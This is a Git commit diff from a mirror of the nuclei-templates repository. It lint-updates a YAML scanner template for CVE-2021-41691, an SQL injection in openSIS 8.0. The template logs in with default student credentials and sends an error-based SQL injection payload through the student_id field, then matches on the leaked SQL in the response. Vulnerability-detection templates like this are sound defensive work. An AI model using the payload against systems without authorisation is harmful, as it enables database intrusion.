daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

lint update

patch-1
Sandeep Singh 2022-03-22 13:04:29 +05:30 committed by GitHub
parent bc30daa9fb
commit 21c2c0cd2c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 11 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
cves/2021/CVE-2021-41691.yaml
View File

@ -4,8 +4,7 @@ info:
name: openSIS Student Information System 8.0 SQl Injection Vulnerability name: openSIS Student Information System 8.0 SQl Injection Vulnerability
author: Bartu Utku SARP author: Bartu Utku SARP
severity: high severity: high
description: description reference:
reference:
- https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691 - https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691
- https://www.exploit-db.com/exploits/50637 - https://www.exploit-db.com/exploits/50637
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41691 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41691
@ -18,26 +17,30 @@ requests:
Host: {{Hostname}} Host: {{Hostname}}
Origin: {{BaseURL}} Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}/index.php?modfunc=logout
Connection: close
USERNAME=student&PASSWORD=student%40123&language=en&log= USERNAME={{username}}&PASSWORD={{password}}&language=en&log=
- | - |
POST /TransferredOutModal.php?modfunc=detail HTTP/1.1 POST /TransferredOutModal.php?modfunc=detail HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Origin: {{BaseURL}} Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}/index.php?modfunc=logout
Connection: close
student_id=updatexml(0x23,concat(1,md5(1234)),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 student_id=updatexml(0x23,concat(1,md5(1234)),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5
attack: pitchfork
payloads:
username:
- student
password:
- student@123
req-condition: true req-condition: true
cookie-reuse: true cookie-reuse: true
matchers: matchers:
- type: dsl - type: dsl
dsl: dsl:
- 'contains(body_2, "<!-- SQL STATEMENT:") && contains(body_2, "SELECT COUNT(STUDENT_ID)")' - 'contains(body_2, "<!-- SQL STATEMENT:") && contains(body_2, "SELECT COUNT(STUDENT_ID)")'
- status_code_2 == 200 - 'status_code_2 == 200'
condition: and condition: and